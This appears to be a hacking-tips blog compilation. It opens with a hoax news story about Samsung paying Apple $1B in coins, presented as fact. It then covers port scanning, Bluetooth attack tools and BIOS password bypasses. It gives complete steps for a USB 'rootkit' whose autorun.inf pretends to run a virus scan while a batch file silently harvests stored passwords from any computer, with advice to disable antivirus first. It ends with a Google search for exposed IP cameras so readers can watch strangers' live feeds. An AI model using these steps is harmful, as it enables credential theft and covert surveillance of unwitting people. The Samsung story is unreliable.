Samsung Pays $1B to Apple

Yesterday, around 30 delivery trucks filled up with coins in 5 cents denomination arrived at Apple’s headquarters in California.

At first, security personnel in charge in the facility thought that these trucks were at the wrong place but it's not. The Samsung CEO phoned the Apple CEO and confirmed that the truck of billions of coins was for them. It was the payment for the charges as a result of the dispute between the two companies about a patent suspectedly copied by Samsung from iPhone.

As Apple wins over the Samsung, it is not said in the contract any clause about how was the payment will be made. Samsung CEO is a genius geek that knows how to play, and that's really funny when someone pays an obligation a million pieces of coins. Haha!

Now, the questions are:

1. How does Apple count the money in a fastest way? Will they hire additional crews for this?


2. Is there a bank that would accept this tons of coins?

Lee Kun-Hee, Chairman of Samsung Electronics, told the media that his company is not going to be intimidated by a group of “geeks with style” and that if they want to play dirty, they also know how to do it. From: InfoLinkZone

A total of 20 billion coins, deliver hope to finish this week.

Let’s see how Apple will respond to this

 

Source: https://www.facebook.com/InfoLinkZone

Find a Port to Hack

What is a port scanner?

A port scanner is a handy tool that scans a computer looking for active ports. With this utility, a potential “hacker” can figure out what services are available on a targeted computer from the responses the port scanner receives. Take a look at the list below for reference.
Starting Scan.

Target Host: www.yourcompany.com
TCP Port :7 (echo)
TCP Port :9 (discard)
TCP Port :13 (daytime)
TCP Port :19 (chargen)
TCP Port :21 (ftp)
TCP Port :23 (telnet)
TCP Port :25 (smtp)
TCP Port :37 (time)
TCP Port :53 (domain)
TCP Port :79 (finger)
TCP Port :80 (www)
TCP Port :110 (pop)
TCP Port :111 (sunrpc)
Finished.

Scanning for open ports is done in two ways. The first is to scan a single IP address for open ports. The second is to scan
a range of IP address to find open ports.

Try to think about this like calling a single phone-number of say 555-4321 and asking for every extension available. In relation to scanning, the phone-number is equivalent to the IP address and the extensions to open ports.

Scanning a range of IP address is like calling every number between 555-0000 to 555-9999 and asking for every extension available at every number.

Hacking Bluetooth Devices

If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them.

This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices.

Discovering Bluetooth Devices

BlueScanner - BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device.

BlueSniff - BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices.

BTBrowser - Bluetooth Browser is a J2ME application that can Browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 - the Java Bluetooth specification.

BTCrawler -BTCrawler is a scanner for Windows Mobile based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks.

Hacking Bluetooth Devices

BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information.

CIHWB - Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack.

Bluediving - Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode.

Transient Bluetooth Environment Auditor - T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.

Bluesnarfer - Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data.

BTcrack - BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges.

Blooover II - Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable.

BlueTest - BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.

BTAudit - BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.

I have not familiar with all of these tools, not even half of them tell you the truth, but if you need to know where to download any of these tools either message me or google them. If you need an explanation on how one works or how to make it work, message me with any question you need to ask, ill tell you from what i know and i will research it and give you the best explanation possible.

How to Bypass BIOS Password?

This depends on what BIOS the machine has. Common BIOS's include AMI, Award, IBM and Phoenix. Numerous other BIOS's do exist, but these are the most common.

Some BIOS's allow you to require a password be entered before the system will boot. Some BIOS's allow you to require a password to be entered before the BIOS setup may be accessed.

Every BIOS must store this password information somewhere. If you are able to access the machine after it has been booted successfully, you may be able to view the password. You must know the memory address where the password is stored, and the format in which the password is stored. Or, you must have a program that knows these things.

The most common BIOS password attack programs are for Ami BIOS. Some password attack programs will return the AMI BIOS password in plain text, some will return it in ASCII codes, some will return it in scan codes. This appears to be dependent not just on the password attacker, but also on the version of Ami BIOS.

To obtain Ami BIOS password attackers, ftp to oak.oakland.edu/simtel/msdos/sysutil/.

If you cannot access the machine after if has been powered up, it is still possible to get past the password. The password is stored in CMOS memory that is maintained while the PC is powered off by a small battery, which is attached to the motherboard. If you remove this battery, all CMOS information will be lost. You will need to re-enter the correct CMOS setup information to use the machine. The machines owner or user will most likely be alarmed when it is discovered that the BIOS password has been deleted.

On some motherboards, the battery is soldered to the motherboard, making it difficult to remove. If this is the case, you have another alternative. Somewhere on the motherboard you should find a jumper that will clear the BIOS password. If you have the motherboard documentation, you will know where that jumper is. If not, the jumper may be labeled on the motherboard. If you are not fortunate enough for either of these to be the case, you may be able to guess which jumper is the correct jumper. This jumper is usually standing alone near the battery.

Get Passwords Using USB Drive

Have you ever imagine that the pen drive or flashdrive you are using for data transfers can be a hacking device?

There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here are the procedures in creating the password hacking toolkit.

NOTE: Please disable any antivirus software before doing this.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it
Code:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

Code:
start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: The author is not responsible to any damages you might faced in using this tool. The main objective of this tutorial is to help you guys recover lost passwords in your computer machine.

Watch Them Thru Their Cams

It was a question in my mind "how can I access my mobile phone's camera in any computer with internet connection". Until such time I got bored again, I came up with the idea of tickling a network IP camera. That is, I figured out that accessing the live stream of your camera in your local machine, gives you an unsecured URL path which can be viewed in any computer via the internet.

Let's have an example:

A Network Camera which brand name I preferred not to tell you for my personal reason has a stream URL path containing  "/viewerframe?mode=". I don't know if other network cams has the same content URL.

Now, we can look for an establishment, organization, public places where they also use this kind of IP cam. Let us visit google.com and browse the internet for any public IPs using the phrase inurl:"viewerframe?mode=". 

From the search results as shown above, just look and take note those links with the public IP address as highlighted in the figure. Let's look into the first link which has a public IP in its URL. We have accessed now the camera live in our personal computer as shown in the picture below. The good feature of this netcam brand is you can control the viewing by turning the camera position left, right, up, and down to view the whole place.

You are not aware that because of this vulnerability, others can view and watch you. For the establishments who are using this kind of network camera, it is advised that you should update the firmware by going to the manufacturer/vendor's website of this kind of product for blocking them from accessing your network camera. Another solution is to change the username and password of your device. Please follow instructions in your device manual.

I'll get back to you again and post additional hacking tips on network cameras.